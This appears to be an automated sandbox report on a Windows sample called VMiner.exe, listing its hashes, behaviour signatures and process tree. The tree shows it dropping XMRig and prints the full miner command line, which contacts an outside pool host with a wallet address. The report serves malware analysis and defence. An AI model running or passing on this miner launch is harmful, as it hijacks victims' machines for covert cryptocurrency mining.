Analysis

  • max time kernel
    1626s
  • max time network
    1787s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20240802-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20240802-enlocale:en-usos:windows10-2004-x64system
  • submitted
    25/08/2024, 06:38

General

  • Target

    VMiner.exe

  • Size

    6.9MB

  • MD5

    cc81947de225d6961ae90929830442fe

  • SHA1

    31c2ae3d0fc6b218a896c278b33471558a9690a5

  • SHA256

    1e830a7cd4a3cd3129996ed9f65bcb2046cf8183278628a990cdb859dc8cf1cb

  • SHA512

    9a88ec1fb0bfc2531341054fef5c31aa47c9775f034cef352b0b8f9470968b5756757c65d7888855907c43e8c4259d3bc5586514e2031a8a8704d52b7349fb61

  • SSDEEP

    98304:zKOWhECzMM3tGfREhv5LeY2dtF8IAPBQbWaotGFqcu54waSDr:eBnzftGqhEzdT0P08tGAP546Dr

Score
10/10

Malware Config

Signatures

  • XMRig Miner payload 2 IoCs
  • xmrig

    XMRig is a high performance, open source, cross platform CPU/GPU miner.

  • Executes dropped EXE 1 IoCs
  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
  • Modifies system certificate store 2 TTPs 3 IoCs
  • Suspicious use of AdjustPrivilegeToken 2 IoCs
  • Suspicious use of FindShellTrayWindow 1 IoCs
  • Suspicious use of WriteProcessMemory 6 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\VMiner.exe
    "C:\Users\Admin\AppData\Local\Temp\VMiner.exe"
    1⤵
    • Modifies system certificate store
    • Suspicious use of WriteProcessMemory
    PID:4176
    • C:\Windows\system32\cmd.exe
      cmd /C start C:\Users\Admin\AppData\Roaming\vminer\start.cmd
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:1920
      • C:\Windows\system32\cmd.exe
        C:\Windows\system32\cmd.exe /K C:\Users\Admin\AppData\Roaming\vminer\start.cmd
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:3104
        • C:\Users\Admin\AppData\Roaming\vminer\xmrig.exe
          xmrig.exe -o xmrig.sd1.rostech.dev:6164 -u 43EiyU9JorPM6YbxLNZ3ehSxpZszgQkwmhRdLBKhG1SnjeHWz2uKpokUqR5b9T6wKrWrGb5vMmGMq1UV4845ZYsQLau19bV -p VMiner -k
          4⤵
          • Executes dropped EXE
          • Suspicious use of AdjustPrivilegeToken
          • Suspicious use of FindShellTrayWindow
          PID:3888

Network

        MITRE ATT&CK Enterprise v15

        Replay Monitor

        Loading Replay Monitor...

        Downloads

        • C:\Users\Admin\AppData\Roaming\vminer\start.cmd

          Filesize

          186B

          MD5

          56ba23eefeefff219fba1d22fb439f8f

          SHA1

          b87106bad5e5c44b2316f43b160b8b63a0d39131

          SHA256

          8d546397cfccd5b4cbffa0711605718413502123ab7471c861cb0cc233891fe3

          SHA512

          ac4709d89c457f6f25665d5a346f7df73a02f9ac2afdf0f0c6da1ef8bbd3a43cba9ca824877860da50f728a9810a50c1e54eea8269d6634b794b70969c05775b

        • C:\Users\Admin\AppData\Roaming\vminer\xmrig.exe

          Filesize

          6.1MB

          MD5

          5fba8ae226b096da3b31de0e17496735

          SHA1

          d532a01254cf9e0229d3c5803b78ff7c9b0cb8d3

          SHA256

          ca28f4aeaa5e16d216cd828b67454a56f3c7feeb242412d26ed914fadff20d40

          SHA512

          951e44fc0864a6741bcbb4227feb5429a032713dabd91102f4f0e27a69181ce7f23562e902cc09896ae26334b6d18caf0f5a13d81370bd703fd7ed6f78b47e72

        • memory/3888-13-0x0000027A9CCE0000-0x0000027A9CD00000-memory.dmp

          Filesize

          128KB

        • memory/3888-14-0x0000027A9E6E0000-0x0000027A9E700000-memory.dmp

          Filesize

          128KB

        • memory/3888-16-0x0000027A9E720000-0x0000027A9E740000-memory.dmp

          Filesize

          128KB

        • memory/3888-15-0x0000027A9E700000-0x0000027A9E720000-memory.dmp

          Filesize

          128KB

        • memory/3888-17-0x0000027A9E700000-0x0000027A9E720000-memory.dmp

          Filesize

          128KB

        • memory/3888-18-0x0000027A9E720000-0x0000027A9E740000-memory.dmp

          Filesize

          128KB